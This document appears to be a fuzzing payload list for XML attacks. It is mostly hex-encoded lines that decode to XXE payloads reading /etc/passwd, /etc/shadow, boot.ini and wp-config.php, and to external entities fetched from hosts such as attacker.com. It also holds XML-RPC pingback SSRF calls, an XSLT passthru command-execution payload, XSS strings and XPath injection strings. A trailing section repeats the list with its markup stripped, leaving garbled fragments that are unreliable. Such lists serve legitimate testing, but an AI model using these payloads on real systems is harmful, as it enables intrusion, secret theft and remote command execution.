3c21454e544954592025207878652053595354454d20227068703a2f2f66696c7465722f636f6e766572742e6261736536342d656e636f64652f7265736f757263653d2f6574632f70617373776422203e0a 61 | 3c21454e544954592073797374656d456e746974792053595354454d2022726f626f74732e747874223e0a 62 | 3c215b43444154415b3c5d5d3e5343524950543c215b43444154415b3e5d5d3e616c657274282758535327293b3c215b43444154415b3c5d5d3e2f5343524950543c215b43444154415b3e5d5d3e0a 63 | 3c215b43444154415b3c5d5d3e7363726970743c215b43444154415b3e5d5d3e616c657274282778737327293c215b43444154415b3c5d5d3e2f7363726970743c215b43444154415b3e5d5d3e0a 64 | 3c215b43444154415b3c7363726970743e766172206e3d303b7768696c652874727565297b6e2b2b3b7d3c2f7363726970743e5d5d3e0a 65 | 3c215b43444154415b3c746573743e3c2f746573743e5d5d3e0a 66 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e0a 67 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e203c21444f435459504520666f6f205b20202020203c21454c454d454e5420666f6f20414e59203e2020203c21454e54495459207878652053595354454d202266696c653a2f2f2f6574632f736861646f7722203e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 68 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e203c21444f435459504520666f6f205b20202020203c21454c454d454e5420666f6f20414e59203e2020203c21454e54495459207878652053595354454d202268747470733a2f2f63726f7764736869656c642e636f6d2f2e74657374696e672f7266692e74787422203e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 69 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e203c21444f435459504520666f6f205b20202020203c21454c454d454e5420666f6f20414e59203e20203c21454e54495459207878652053595354454d202266696c653a2f2f2f633a2f626f6f742e696e6922203e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 70 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e203c21444f435459504520666f6f205b20202020203c21454c454d454e5420666f6f20414e59203e20203c21454e54495459207878652053595354454d202266696c653a2f2f2f6574632f70617373776422203e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 71 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b203c21454c454d454e5420666f6f20414e593e3c21454e54495459207878652053595354454d202266696c653a2f2f2f6574632f706173737764223e205d3e0a 72 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d202266696c653a2f2f2f633a2f626f6f742e696e6922203e5d3e0a 73 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d202266696c653a2f2f2f633a2f626f6f742e696e6922203e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 74 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d202266696c653a2f2f2f633a2f626f6f742e696e6922203e5d3e3c666f6f3e267878653b3c2f666f6f3e203c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e2020203c21454e54495459207878652053595354454d2022687474703a2f2f7777772e61747461636b65722e636f6d2f746578742e747874223e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 75 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d202266696c653a2f2f2f6574632f697373756522203e5d3e0a 76 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d202266696c653a2f2f2f6574632f697373756522203e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 77 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d202266696c653a2f2f2f6574632f70617373776422203e5d3e0a 78 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d202266696c653a2f2f2f6574632f70617373776422203e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 79 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d202266696c653a2f2f2f6574632f70617373776422203e5d3e3c666f6f3e267878653b3c2f666f6f3e3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d202266696c653a2f2f2f6574632f736861646f77223e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 80 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d202266696c653a2f2f2f6574632f736861646f7722203e5d3e0a 81 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d202266696c653a2f2f2f6574632f736861646f7722203e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 82 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d2022687474703a2f2f6578616d706c652e636f6d3a383022203e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 83 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e59203e3c21454e54495459207878652053595354454d2022687474703a2f2f6578616d706c653a34343322203e5d3e0a 84 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e593e3c21454e54495459207865652053595354454d202266696c653a2f2f2f6465762f72616e646f6d223e5d3e3c666f6f3e267865653b3c2f666f6f3e0a 85 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e593e3c21454e54495459207865652053595354454d202266696c653a2f2f2f6574632f706173737764223e5d3e3c666f6f3e267865653b3c2f666f6f3e0a 86 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e593e3c21454e54495459207865652053595354454d202266696c653a2f2f2f6574632f736861646f77223e5d3e3c666f6f3e267865653b3c2f666f6f3e0a 87 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e593e3c21454e54495459207865652053595354454d202266696c653a2f2f633a2f626f6f742e696e69223e5d3e3c666f6f3e267865653b3c2f666f6f3e0a 88 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e593e3c21454e54495459207878652053595354454d202266696c653a2f2f2f2f6465762f72616e646f6d223e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 89 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e593e3c21454e54495459207878652053595354454d202266696c653a2f2f2f2f6574632f706173737764223e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 90 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e593e3c21454e54495459207878652053595354454d202266696c653a2f2f2f2f6574632f736861646f77223e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 91 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e593e3c21454e54495459207878652053595354454d202266696c653a2f2f633a2f626f6f742e696e69223e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 92 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e593e3c21454e54495459207878652053595354454d2022687474703a2f2f736e3170657273656375726974792e636f6d2f2e74657374696e672f7266695f76756c6e2e747874223e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 93 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e593e3c21454e54495459207878652053595354454d2022687474703a2f2f7865726f73656375726974792e636f6d2f2e74657374696e672f7266695f76756c6e2e747874223e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 94 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520666f6f205b3c21454c454d454e5420666f6f20414e593e3c21454e54495459207878652053595354454d202268747470733a2f2f63726f7764736869656c642e636f6d2f2e74657374696e672f7266695f76756c6e2e747874223e5d3e3c666f6f3e267878653b3c2f666f6f3e0a 95 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520787865205b3c21454e5449545920666f6f2022616161616161223e5d3e0a 96 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c21444f435459504520787865205b3c21454e5449545920666f6f2022616161616161223e5d3e3c726f6f743e26666f6f3b3c2f726f6f743e0a 97 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c666f6f3e3c215b43444154415b27206f7220313d31206f722027273d275d5d3e3c2f666f6f3e0a 98 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c666f6f3e3c215b43444154415b27206f7220313d31206f722027273d275d5d3e3c2f666f6f663e0a 99 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c666f6f3e3c215b43444154415b3c5d5d3e5343524950543c215b43444154415b3e5d5d3e616c657274282758535327293b3c215b43444154415b3c5d5d3e2f5343524950543c215b43444154415b3e5d5d3e3c2f666f6f3e0a 100 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c666f6f3e3c215b43444154415b3c5d5d3e5343524950543c215b43444154415b3e5d5d3e616c6572742827676f7463686127293b3c215b43444154415b3c5d5d3e2f5343524950543c215b43444154415b3e5d5d3e3c2f666f6f3e0a 101 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d2249534f2d383835392d31223f3e3c746573743e3c2f746573743e0a 102 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d227574662d313622207374616e64616c6f6e653d22796573223f3e3c6d6574686f6443616c6c3e3c6d6574686f644e616d653e70696e676261636b2e70696e673c2f6d6574686f644e616d653e3c706172616d733e3c706172616d3e3c76616c75653e3c737472696e673e68747470733a2f2f776f726470726573732e6f72672f3c2f737472696e673e3c2f76616c75653e3c2f706172616d3e3c706172616d3e3c76616c75653e3c737472696e673e687474703a2f2f736e3170657273656375726974792e636f6d3c2f737472696e673e3c2f76616c75653e3c2f706172616d3e3c2f706172616d733e3c2f6d6574686f6443616c6c3e0a 103 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d227574662d313622207374616e64616c6f6e653d22796573223f3e3c6d6574686f6443616c6c3e3c6d6574686f644e616d653e70696e676261636b2e70696e673c2f6d6574686f644e616d653e3c706172616d733e3c706172616d3e3c76616c75653e3c737472696e673e68747470733a2f2f776f726470726573732e6f72672f3c2f737472696e673e3c2f76616c75653e3c2f706172616d3e3c706172616d3e3c76616c75653e3c737472696e673e687474703a2f2f7865726f73656375726974792e636f6d3c2f737472696e673e3c2f76616c75653e3c2f706172616d3e3c2f706172616d733e3c2f6d6574686f6443616c6c3e0a 104 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d227574662d38223f3e3c21444f435459504520646f63205b3c21454c454d454e54207465737420414e59203e3c21454e54495459207878652053595354454d20227068703a2f2f66696c7465722f726561642d636f6e766572742e6261736536342d656e636f64652f7265736f757263653d66696c653a2f2f2f433a2f626f6f742e696e6922203e5d3e3c646f633e3c746573743e436f6e74656e7473206f662066696c653a20267878653b3c2f746573743e3c2f646f633e0a 105 | 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d227574662d38223f3e3c21444f435459504520646f63205b3c21454c454d454e54207465737420414e59203e3c21454e54495459207878652053595354454d20227068703a2f2f66696c7465722f726561642d636f6e766572742e6261736536342d656e636f64652f7265736f757263653d66696c653a2f2f2f433a2f6874646f63732f776f726470726573732f77702d636f6e6669672e70687022203e5d3e3c646f633e3c746573743e436f6e74656e7473206f662066696c653a20267878653b3c2f746573743e3c2f646f633e0a 106 | 3c3f786d6c2076657273696f6e3d22312e3022207374616e64616c6f6e653d22796573223f3e3c21444f43545950452065726e77205b203c21454e54495459207878652053595354454d202266696c653a2f2f2f6574632f70617373776422203e205d3e3c7376672077696474683d22353030707822206865696768743d2231303070782220786d6c6e733d22687474703a2f2f7777772e77332e6f72672f323030302f7376672220786d6c6e733a786c696e6b3d22687474703a2f2f7777772e77332e6f72672f313939392f786c696e6b222076657273696f6e3d22312e31223e3c7465787420666f6e742d66616d696c793d2256657264616e612220666f6e742d73697a653d2231362220783d2231302220793d223430223e267878653b3c2f746578743e3c2f7376673e0a 107 | 3c3f786d6c2076657273696f6e3d22312e3022207374616e64616c6f6e653d22796573223f3e3c21444f43545950452065726e77205b203c21454e54495459207878652053595354454d202266696c653a2f2f2f6574632f70617373776422203e205d3e3c7376672077696474683d22353030707822206865696768743d22343070782220786d6c6e733d22687474703a2f2f7777772e77332e6f72672f323030302f7376672220786d6c6e733a786c696e6b3d22687474703a2f2f7777772e77332e6f72672f313939392f786c696e6b222076657273696f6e3d22312e31223e267878653b3c2f7376673e0a 108 | 3c3f786d6c2076657273696f6e3d22312e30223f3e203c21444f4354595045206368616e67652d6c6f67205b203c21454e544954592073797374656d456e746974792053595354454d20222e2e2f2e2e2f2e2e2f2e2e2f626f6f742e696e69223e205d3e203c6368616e67652d6c6f673e203c746578743e2673797374656d456e746974793b3c2f746578743e203c2f6368616e67652d6c6f673e0a 109 | 3c3f786d6c2076657273696f6e3d22312e30223f3e203c21444f4354595045206368616e67652d6c6f67205b203c21454e544954592073797374656d456e746974792053595354454d20222e2e2f2e2e2f2e2e2f626f6f742e696e6922205d3e203c6368616e67652d6c6f673e203c746578743e2673797374656d456e746974793b3c2f746578743e3b203c2f6368616e67652d6c6f673e0a 110 | 3c3f786d6c2076657273696f6e3d22312e30223f3e203c21444f4354595045206368616e67652d6c6f67205b203c21454e544954592073797374656d456e746974792053595354454d2022726f626f74732e747874223e205d3e203c6368616e67652d6c6f673e203c746578743e2673797374656d456e746974793b3c2f746578743e203c2f6368616e67652d6c6f673e0a 111 | 3c3f786d6c2076657273696f6e3d22312e30223f3e203c21444f4354595045206368616e67652d6c6f67205b203c21454e544954592073797374656d456e746974792053595354454d2022726f626f74732e747874223e205d3e203c6368616e67652d6c6f673e203c746578743e2673797374656d456e746974793b3c2f746578743e3b203c2f6368616e67652d6c6f673e0a 112 | 3c3f786d6c2076657273696f6e3d22312e30223f3e3c21444f4354595045206368616e67652d6c6f675b203c21454e54495459206d79456e746974792022576f726c64223e205d3e3c6368616e67652d6c6f673e3c746578743e48656c6c6f20266d79456e746974793b3c2f746578743e3c2f6368616e67652d6c6f673e0a 113 | 3c3f786d6c2076657273696f6e3d22312e30223f3e3c21444f4354595045206368616e67652d6c6f675b203c21454e54495459206d79456e746974792022576f726c64223e3c21454e54495459206d7951756f746520222671756f743b223e205d3e3c6368616e67652d6c6f673e3c746578743e266d7951756f74653b48656c6c6f20266d79456e746974793b266d7951756f74653b3c2f746578743e3c2f6368616e67652d6c6f673e0a 114 | 3c3f786d6c2076657273696f6e3d22312e30223f3e3c6368616e67652d6c6f673e3c746578743e2671756f743b48656c6c6f20576f726c642671756f743b3c2f746578743e3c2f6368616e67652d6c6f673e0a 115 | 3c3f786d6c2076657273696f6e3d22312e30223f3e3c6368616e67652d6c6f673e3c746578743e3c7363726970743e616c6572742831293c2f7363726970743e3c2f746578743e3c2f6368616e67652d6c6f673e0a 116 | 3c3f786d6c2076657273696f6e3d22312e30223f3e3c6368616e67652d6c6f673e3c746578743e48656c6c6f20576f726c643c2f746578743e3c2f6368616e67652d6c6f673e0a 117 | 3c3f786d6c2076657273696f6e3d22312e30223f3e3c6d6574686f6443616c6c3e3c6d6574686f644e616d653e64656d6f2e73617948656c6c6f3c2f6d6574686f644e616d653e3c706172616d733e3c2f706172616d733e3c2f6d6574686f6443616c6c3e0a 118 | 3c3f786d6c2076657273696f6e3d27312e3027207374616e64616c6f6e653d276e6f273f3e3c21444f435459504520666f6f205b3c21454e5449545920252066356133302053595354454d202268747470733a2f2f63726f7764736869656c642e636f6d2f2e74657374696e672f7266695f76756c6e2e747874223e2566356133303b205d3e0a 119 | 3c48544d4c20786d6c6e733a7873733e3c3f696d706f7274206e616d6573706163653d227873732220696d706c656d656e746174696f6e3d22687474703a2f2f68612e636b6572732e6f72672f7873732e687463223e0a 120 | 3c48544d4c20786d6c6e733a7873733e3c3f696d706f7274206e616d6573706163653d227873732220696d706c656d656e746174696f6e3d22687474703a2f2f68612e636b6572732e6f72672f7873732e687463223e3c7873733a7873733e5853533c2f7873733a7873733e3c2f48544d4c3e0a 121 | 3c48544d4c20786d6c6e733a7873733e3c3f696d706f7274206e616d6573706163653d227873732220696d706c656d656e746174696f6e3d2268747470733a2f2f63726f7764736869656c642e636f6d2f2e74657374696e672f7873732e68746d6c223e3c7873733a7873733e5853533c2f7873733a7873733e3c2f48544d4c3e0a 122 | 3c5350414e20444154415352433d23492044415441464c443d432044415441464f524d415441533d48544d4c3e3c2f5350414e3e0a 123 | 3c6368616e67652d6c6f673e203c746578743e2673797374656d456e746974793b3c2f746578743e203c2f6368616e67652d6c6f673e0a 124 | 3c666f6f3e3c215b43444154415b27206f7220313d31206f722027273d275d5d3e3c2f666f6f3e0a 125 | 3c666f6f3e3c215b43444154415b3c5d5d3e5343524950543c215b43444154415b3e5d5d3e616c657274282758535327293b3c215b43444154415b3c5d5d3e2f5343524950543c215b43444154415b3e5d5d3e3c2f666f6f3e0a 126 | 3c6e616d653e272c272729293b20706870696e666f28293b20657869743b2f2a3c2f6e616d653e0a 127 | 3c736f61703a426f64793e3c666f6f3e3c215b43444154415b3c21444f435459504520646f63205b3c21454e544954592025206474642053595354454d2022687474703a2f2f782e782e782e783a32322f223e20256474643b5d3e3c7878782f3e5d5d3e3c2f666f6f3e3c2f736f61703a426f64793e0a 128 | 3c746573743e20246c444f4d446f63756d656e742d3e74657874436f6e74656e743d3c215b43444154415b3c5d5d3e7363726970743c215b43444154415b3e5d5d3e616c657274282758535327293c215b43444154415b3c5d5d3e2f7363726970743c215b43444154415b3e5d5d3e203c2f746573743e0a 129 | 3c746573743e3c2f746573743e0a 130 | 3c786d6c2049443d22787373223e3c493e3c423e266c743b494d47205352433d226a617661733c212d2d202d2d3e63726970743a616c65727428275853532729222667743b3c2f423e3c2f493e3c2f786d6c3e3c5350414e20444154415352433d2223787373222044415441464c443d2242222044415441464f524d415441533d2248544d4c223e3c2f5350414e3e3c2f433e3c2f583e3c2f786d6c3e3c5350414e20444154415352433d23492044415441464c443d432044415441464f524d415441533d48544d4c3e3c2f5350414e3e0a 131 | 3c786d6c2049443d22787373223e3c493e3c423e3c494d47205352433d226a617661733c212d2d202d2d3e63726970743a616c65727428275853532729223e3c2f423e3c2f493e3c2f786d6c3e3c5350414e20444154415352433d2223787373222044415441464c443d2242222044415441464f524d415441533d2248544d4c223e3c2f5350414e3e3c2f433e3c2f583e3c2f786d6c3e3c5350414e20444154415352433d23492044415441464c443d432044415441464f524d415441533d48544d4c3e3c2f5350414e3e0a 132 | 3c786d6c2049443d22787373223e3c493e3c423e3c494d47205352433d226a617661733c212d2d202d2d3e63726970743a616c65727428275853532729223e3c2f423e3c2f493e3c2f786d6c3e3c5350414e20444154415352433d2223787373222044415441464c443d2242222044415441464f524d415441533d2248544d4c223e3c2f5350414e3e3c2f433e3c2f583e3c2f786d6c3e3c5350414e20444154415352433d23492044415441464c443d432044415441464f524d415441533d48544d4c3e3c2f5350414e3e220a 133 | 3c786d6c2049443d493e3c583e3c433e3c215b43444154415b3c494d47205352433d226a617661735d5d3e3c215b43444154415b63726970743a616c657274282758535327293b223e5d5d3e0a 134 | 3c786d6c2049443d493e3c583e3c433e3c215b43444154415b3c494d47205352433d226a617661735d5d3e3c215b43444154415b63726970743a616c657274282758535327293b223e5d5d3e220a 135 | 3c786d6c205352433d2268747470733a2f2f63726f7764736869656c642e636f6d2f2e74657374696e672f7266695f76756c6e2e747874222049443d493e3c2f786d6c3e3c5350414e20444154415352433d23492044415441464c443d432044415441464f524d415441533d48544d4c3e3c2f5350414e3e220a 136 | 3c786d6c205352433d2268747470733a2f2f63726f7764736869656c642e636f6d2f2e74657374696e672f7873732e68746d6c222049443d493e3c2f786d6c3e3c5350414e20444154415352433d23492044415441464c443d432044415441464f524d415441533d48544d4c3e3c2f5350414e3e0a 137 | 3c786d6c205352433d22787373746573742e786d6c222049443d493e3c2f786d6c3e0a 138 | 3c786d6c205352433d22787373746573742e786d6c222049443d493e3c2f786d6c3e3c5350414e20444154415352433d23492044415441464c443d432044415441464f524d415441533d48544d4c3e3c2f5350414e3e0a 139 | 3c786d6c2076657273696f6e3d22312e30223f3e3c21444f435459504520585845205b3c21454c454d454e54206d6574686f644e616d6520414e59203e3c21454e54495459207878652053595354454d20222e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764223e5d3e3c6d6574686f6443616c6c3e3c6d6574686f644e616d653e267878653c2f6d6574686f644e616d653e3c2f6d6574686f6443616c6c3e0a 140 | 3c786d6c2076657273696f6e3d22312e30223f3e3c21444f435459504520585845205b3c21454c454d454e54206d6574686f644e616d6520414e59203e3c21454e54495459207878652053595354454d2022687474703a2f2f736e3170657273656375726974792e636f6d2f2e74657374696e672f7266695f76756c6e2e747874223e5d3e3c6d6574686f6443616c6c3e3c6d6574686f644e616d653e267878653c2f6d6574686f644e616d653e3c2f6d6574686f6443616c6c3e0a 141 | 3c786d6c2076657273696f6e3d22312e30223f3e3c21444f435459504520585845205b3c21454c454d454e54206d6574686f644e616d6520414e59203e3c21454e54495459207878652053595354454d2022687474703a2f2f7865726f73656375726974792e636f6d2f2e74657374696e672f7266695f76756c6e2e747874223e5d3e3c6d6574686f6443616c6c3e3c6d6574686f644e616d653e267878653c2f6d6574686f644e616d653e3c2f6d6574686f6443616c6c3e0a 142 | 3c786d6c2076657273696f6e3d22312e30223f3e3c21444f435459504520585845205b3c21454c454d454e54206d6574686f644e616d6520414e59203e3c21454e54495459207878652053595354454d202268747470733a2f2f63726f7764736869656c642e636f6d2f2e74657374696e672f7266695f76756c6e2e747874223e5d3e3c6d6574686f6443616c6c3e3c6d6574686f644e616d653e267878653c2f6d6574686f644e616d653e3c2f6d6574686f6443616c6c3e0a 143 | 3c78736c3a7374796c6573686565742076657273696f6e3d22312e302220786d6c6e733a78736c3d22687474703a2f2f7777772e77332e6f72672f313939392f58534c2f5472616e73666f726d2220786d6c6e733a7068703d22687474703a2f2f7068702e6e65742f78736c223e3c78736c3a74656d706c617465206d617463683d222f223e3c7363726970743e616c65727428313233293c2f7363726970743e3c2f78736c3a74656d706c6174653e3c2f78736c3a7374796c6573686565743e0a 144 | 3c78736c3a7374796c6573686565742076657273696f6e3d22312e302220786d6c6e733a78736c3d22687474703a2f2f7777772e77332e6f72672f313939392f58534c2f5472616e73666f726d2220786d6c6e733a7068703d22687474703a2f2f7068702e6e65742f78736c223e3c78736c3a74656d706c617465206d617463683d222f223e3c78736c3a636f70792d6f662073656c6563743d22646f63756d656e7428272f6574632f7061737377642729222f3e3c2f78736c3a74656d706c6174653e3c2f78736c3a7374796c6573686565743e0a 145 | 3c78736c3a7374796c6573686565742076657273696f6e3d22312e302220786d6c6e733a78736c3d22687474703a2f2f7777772e77332e6f72672f313939392f58534c2f5472616e73666f726d2220786d6c6e733a7068703d22687474703a2f2f7068702e6e65742f78736c223e3c78736c3a74656d706c617465206d617463683d222f223e3c78736c3a76616c75652d6f662073656c6563743d227068703a66756e6374696f6e28277061737374687275272c276c73202d6c612729222f3e3c2f78736c3a74656d706c6174653e3c2f78736c3a7374796c6573686565743e0a 146 | 400a 147 | 402a0a 148 | 5b546e6e39365d0a 149 | 5d3e0a 150 | 636f756e74282f6368696c643a3a6e6f64652829290a 151 | 66616c73650a 152 | 6e756c6c0a 153 | 747275650a 154 | 7827206f7220313d31206f72202778273d27790a 155 | 7827206f72206e616d6528293d27757365726e616d6527206f72202778273d27790a 156 | 7b3d20546e6e39367d0a 157 | 7b546e6e39367d0a 158 | 7b7b3d20546e6e39367d7d0a 159 | 7b7b546e6e39367d7d0a 160 | 7d7d3c2f7363726970743e222227220a 161 | 7d7d3c2f7363726970743e270a 162 | 7d7d3c2f7363726970743e27220a 163 | 7d7d3c2f7363726970743e3c7363726970743e616c6572742831293b3c2f7363726970743e3c2f626f64793e3c2f68746d6c3e3c212d2d0a 164 | e280980a 165 | e2809c 166 | -------------------------------------------------------------------------------- /XXE/unicode_encoded.txt: -------------------------------------------------------------------------------- 1 | "XSS"\n 2 | "cript:alert('XSS')"">"\n 3 | "]]>"\n 4 | ""\n 5 | "}}'\n 6 | "}}cript:alert('XSS')">\n 131 | \n 132 | "\n 133 | ]]>\n 134 | ]]>"\n 135 | "\n 136 | \n 137 | \n 138 | \n 139 | ]>&xxe\n 140 | ]>&xxe\n 141 | ]>&xxe\n 142 | ]>&xxe\n 143 | \n 144 | \n 145 | \n 146 | @\n 147 | @*\n 148 | [Tnn96]\n 149 | ]>\n 150 | count(/child::node())\n 151 | false\n 152 | null\n 153 | true\n 154 | x' or 1=1 or 'x'='y\n 155 | x' or name()='username' or 'x'='y\n 156 | {= Tnn96}\n 157 | {Tnn96}\n 158 | {{= Tnn96}}\n 159 | {{Tnn96}}\n 160 | }}""'"\n 161 | }}'\n 162 | }}'"\n 163 | }}cript:alert('XSS')"">" 3 | "]]>" 4 | "" 5 | "}}' 6 | "}}cript:alert('XSS')"> 131 | 132 | " 133 | ]]> 134 | ]]>" 135 | " 136 | 137 | 138 | 139 | ]>&xxe 140 | ]>&xxe 141 | ]>&xxe 142 | ]>&xxe 143 | 144 | 145 | 146 | @ 147 | @* 148 | [Tnn96] 149 | ]> 150 | count(/child::node()) 151 | false 152 | null 153 | true 154 | x' or 1=1 or 'x'='y 155 | x' or name()='username' or 'x'='y 156 | {= Tnn96} 157 | {Tnn96} 158 | {{= Tnn96}} 159 | {{Tnn96}} 160 | }}""'" 161 | }}' 162 | }}'" 163 | }}